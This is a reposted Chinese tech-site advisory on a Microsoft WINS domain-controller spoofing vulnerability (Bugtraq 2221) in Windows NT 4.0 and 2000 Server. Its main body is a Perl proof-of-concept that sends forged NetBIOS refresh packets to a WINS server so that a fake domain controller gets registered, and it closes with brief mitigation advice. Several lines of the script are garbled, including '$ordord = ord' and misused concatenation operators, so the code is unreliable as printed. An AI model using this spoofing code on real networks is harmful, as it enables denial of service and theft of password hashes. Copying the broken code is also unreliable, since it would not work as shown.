51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

Microsoft WINS之域控制器欺骗漏洞

作者:佚名
运维 系统运维
本文介绍了微软系统中受影响的系统出现域控制器欺骗漏洞进行测试的方法。

Microsoft WINS之域控制器欺骗漏洞如下所述:

受影响系统:

Microsoft Windows NT 4.0

Microsoft Windows NT 2000 Server

描述:

BUGTRAQ ID :2221

Windows Internet名字服务(WINS)随着微软Windows NT服务器分发。WINS负责在一个客户-服务器的环境中将网络计算机名解析为IP地址。

然而,WINS没有正确验证域控制器的注册。用户可能修改一个域控制器的内容,导致WINS服务将发往域控制器的请求重定向到另一个系统。这可能导致该域的网络功能失效。冒牌的域控制器也可以被设置来窃取用户名和口令的哈希值。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

David Byrne (dbyrne@tiaa-cref.org)提供了一个测试程序wins2.pl:

###########################################################################

 

  1. use Socket;  
  2.  
  3. $WINSAddress = "XXX.XXX.XXX.XXX"; #IP Address or Host/NetBIOS name  
  4.  
  5. $DomainName = "AAADUMMY"; #Must be all caps  
  6.  
  7. $SequenceNumber = 0x8000;  
  8.  
  9. socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "Socket not created $!\n";  
  10.  
  11. $destAddress = inet_aton($WINSAddress);  
  12.  
  13. $destPort = sockaddr_in(137, $destAddress);  
  14.  
  15. for ($i=1;$i<=25; $i++)  
  16.  
  17. {SendRefresh ($DomainName, 0x1C, "\x0a\x6a\x00" . chr ($i))}  
  18.  
  19. sub Sequence  
  20.  
  21. {  
  22.  
  23. my ($high, $low, $str);  
  24.  
  25. $high = $SequenceNumber >> 8;  
  26.  
  27. $low = $SequenceNumber % 256;  
  28.  
  29. $SequenceNumber += 2;  
  30.  
  31. $str = chr($high) . chr ($low);  
  32.  
  33. return $str;  
  34.  
  35. }  
  36.  

 

#p#

 

  1. sub SendRelease  
  2.  
  3. {  
  4.  
  5. my ($tempname, $data);  
  6.  
  7. $tempname = NetBIOSName ($_[0], $_[1]);  
  8.  
  9. $data = Sequence () . "\x30\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x00\x00\x00\x00\x06\x20\x00" . $_[2];  
  10.  
  11. send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";  
  12.  
  13. }  
  14.  
  15. sub SendRefresh  
  16.  
  17. {  
  18.  
  19. my ($tempname, $data);  
  20.  
  21. $tempname = NetBIOSName ($_[0], $_[1]);  
  22.  
  23. $data = Sequence () . "\x29\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x04\x93\xe0\x00\x06\xe0\x00" . $_[2];  
  24.  
  25. send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";  
  26.  
  27. }  
  28.  
  29. sub NetBIOSName  
  30.  
  31. {  
  32.  
  33. my ($c, $ord, $high, $low, $tempname);  
  34.  
  35. while ($_[0] =~ /(.)/g)  
  36.  
  37. {  
  38.  
  39. $c++;  
  40.  
  41. $ordord = ord ($1);  
  42.  
  43. $high = $ord >> 4;  
  44.  
  45. $low = $ord % 16;  
  46.  
  47. $tempname .chr($high +65) . chr($low +65);  
  48.  
  49. }  
  50.  
  51. for (;$c<15;$c++)  
  52.  
  53. {$tempname ."\x43\x41"}  
  54.  
  55. $high = $_[1] >> 4;  
  56.  
  57. $low = $_[1] % 16;  
  58.  
  59. $tempname .chr($high +65) . chr($low +65);  
  60.  
  61. return $tempname;  
  62.  
  63. }  
  64.  

 

建议:

临时解决方法:

NSFOCUS建议您采用David Byrne提供的临时解决方法:对于敏感信息,采用静态记录。并在防火墙的DMZ区封锁NetBIOS服务。

Microsoft WINS域控制器欺骗漏洞的介绍希望能够对读者有所帮助。

【编辑推荐】

  1. 域控制器迁移的方法
  2. 域控制器降级基础知识
  3. 域控制器千万别忽视DNS设置
  4. 域控制器的安装及降级的方法
  5. windows2003域控制器升级和降级的图文教程
责任编辑:韩亚珊 来源: 比特网
域控制器
相关推荐
域控制器与备份域控制器角色转换
本文主要阐述在AD域控制器集群中,主域控制器(PDC)与备份域控制器(BDC)之间的角色转换过程,主要介绍了2种方法。

2011-07-12 09:29:10

主域控制器备份域控制器
域控制器清除问题
域控制器与故障计算机取了相同的名称,该如何清除?若取了不同名称,又该如何清除?本文将详细讲述。

2011-07-13 10:29:44

域控制器
额外域控制器如何接替域控制器
本文介绍了主域控制器无法工作时,如何使用域外控制器。

2011-07-14 10:28:54

额外域控制器
域控制器中DHCP、WINS、DNS的安装和基本设置
本文主要讲述了域控制器中的服务三剑客的安装及设置,所谓的服务三剑客是指域控制器中DHCP、WINS、DNS。

2011-07-08 17:58:56

域控制器
域控制器组策略权限继承问题
本文描述了域控制器的组策略管理中,组策略权限的继承是什么以及组策略是如何继承的等内容。

2011-07-18 14:17:07

域控制器组策略OU
备份域控制器的方法
备份域控制器对管理员来说至关重要,本文就是教大家如何轻松备份域控制器。

2011-07-18 13:55:08

域控制器迁移的方法
对于域结构的网络来说,域控制器的重要性不言而喻。如果网络中唯一的域控制器突然崩溃,而事先也没有做好备份,那将是一场灾难。所以如果有条件的话,还是建议在网络中备有额外域控制器。本文就是详细介绍了域控制器迁移的具体实例。

2011-07-07 15:01:02

备份域控制器,未雨绸缪
配置域控制器,未雨绸缪,防止日后局域网域控制器遇到意外而发生瘫痪故障后,网络管理员只要简单地恢复一下域控制器,就能快速恢复局域网中所有工作站的运行状态了。

2011-07-07 17:15:52

备份域控制器的配置
本文主要介绍了备份域控制器是如何配置的,详细介绍了配置步骤。

2011-07-12 09:58:42

主域控制器备份域控制器
深度解读汽车域控制器
过去十多年的汽车智能化和信息化发展产生了一个显著结果就是ECU芯片使用量越来越多。

2022-02-10 16:43:35

汽车智能芯片
域控制器的灵活运用
域控制器是网络管理的核心,重要性可想而知。但是域控制器的配置却并不简单,面对不同的要求,系统管理员需要对域控制器进行个性化的控制和管理。

2011-07-08 13:56:00

域控制器服务器
域控制器在域中的作用
局域网中的域控制器到底有什么作用?本文用简单易懂的语言描述了域控制器在域中的作用,便于大家理解。

2011-07-14 08:49:16

域控制器
域控制器降级之故障排除
域控制器降级的过程中出现倒计时而使计算机重启致使降级无法完成该怎么办?本文讲给出详细的解答。

2011-07-13 10:56:04

如何进行域控制器管理?
域控制器管理对于用户来说是最重要的工作。本文就从域与域控制器的关系、设置域控制器属性、查找目录内容、连接到其他域及域控制器等几个方面介绍域控制器的管理。

2011-07-13 13:13:10

域控制器活动目录
域控制器降级基础知识
本文介绍了域控制器降级的相关基础知识,如域控制器可能无法通过使用ActiveDirectory安装向导(Dcpromo.exe)正常降级的症状,并给出了原因和解决方案;以及MicrosoftWindows2000或MicrosoftWindowsServer2003域控制器降级的具体步骤。

2011-07-07 09:10:17

域控制器降级Active Dire
删除不存在的域控制器具体实例
本文主要讲述了用DOS命令删除不存在的域控制器的具体实例。

2011-07-13 10:01:16

域控制器
windows 2003域控制器之无缝迁移
本文以图文并用的方式详细的介绍了在多级域下的域控制器作迁移工作的步骤方法,使大家对域控制器迁移问题能够进一步的深入了解。

2011-07-06 17:29:33

域控制器域控制器迁移
windows 2000域控制器诊断工具简介
域控制器诊断工具(Dcdiag)可以分析目录林或"组织"中的域控制器状态,并生成一个报告,报告将所有通过诊断测试得到的问题汇集在自身中,当管理人员或技术支持人员分析问题和排除故障时候,依此作为判断的参考资料.

2011-07-28 10:38:35

域控制器
如何配置域控制器NTP Server服务?
本文以问答的形式解释了如何配置域控制器NTPServer服务。

2011-07-20 09:01:33

域控制器ntp服务器
删除域控制器的方法和步骤
从域控制器中删除ActiveDirectory的方法是什么呢?本文将给出详细解答。

2011-07-13 09:00:59

域控制器Active Dire
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服